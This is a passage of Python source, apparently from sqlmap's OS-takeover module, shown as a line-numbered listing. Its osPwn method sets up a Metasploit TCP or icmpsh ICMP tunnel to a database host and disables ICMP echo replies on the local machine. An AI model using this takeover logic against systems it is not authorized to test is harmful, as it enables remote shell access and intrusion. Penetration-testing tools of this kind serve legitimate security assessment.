(self)
| 102 | self.cleanup(web=web) |
| 103 | |
| 104 | def osPwn(self): |
| 105 | goUdf = False |
| 106 | fallbackToWeb = False |
| 107 | setupSuccess = False |
| 108 | |
| 109 | self.checkDbmsOs() |
| 110 | |
| 111 | if Backend.isOs(OS.WINDOWS): |
| 112 | msg = "how do you want to establish the tunnel?" |
| 113 | msg += "\n[1] TCP: Metasploit Framework (default)" |
| 114 | msg += "\n[2] ICMP: icmpsh - ICMP tunneling" |
| 115 | |
| 116 | while True: |
| 117 | tunnel = readInput(msg, default='1') |
| 118 | |
| 119 | if isDigit(tunnel) and int(tunnel) in (1, 2): |
| 120 | tunnel = int(tunnel) |
| 121 | break |
| 122 | |
| 123 | else: |
| 124 | warnMsg = "invalid value, valid values are '1' and '2'" |
| 125 | logger.warning(warnMsg) |
| 126 | else: |
| 127 | tunnel = 1 |
| 128 | |
| 129 | debugMsg = "the tunnel can be established only via TCP when " |
| 130 | debugMsg += "the back-end DBMS is not Windows" |
| 131 | logger.debug(debugMsg) |
| 132 | |
| 133 | if tunnel == 2: |
| 134 | isAdmin = runningAsAdmin() |
| 135 | |
| 136 | if not isAdmin: |
| 137 | errMsg = "you need to run sqlmap as an administrator " |
| 138 | errMsg += "if you want to establish an out-of-band ICMP " |
| 139 | errMsg += "tunnel because icmpsh uses raw sockets to " |
| 140 | errMsg += "sniff and craft ICMP packets" |
| 141 | raise SqlmapMissingPrivileges(errMsg) |
| 142 | |
| 143 | try: |
| 144 | __import__("impacket") |
| 145 | except ImportError: |
| 146 | errMsg = "sqlmap requires 'python-impacket' third-party library " |
| 147 | errMsg += "in order to run icmpsh master. You can get it at " |
| 148 | errMsg += "https://github.com/SecureAuthCorp/impacket" |
| 149 | raise SqlmapMissingDependence(errMsg) |
| 150 | |
| 151 | filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" |
| 152 | |
| 153 | if os.path.exists(filename): |
| 154 | try: |
| 155 | with openFile(filename, "wb") as f: |
| 156 | f.write("1") |
| 157 | except IOError as ex: |
| 158 | errMsg = "there has been a file opening/writing error " |
| 159 | errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) |
| 160 | raise SqlmapSystemException(errMsg) |
| 161 | else: |
no test coverage detected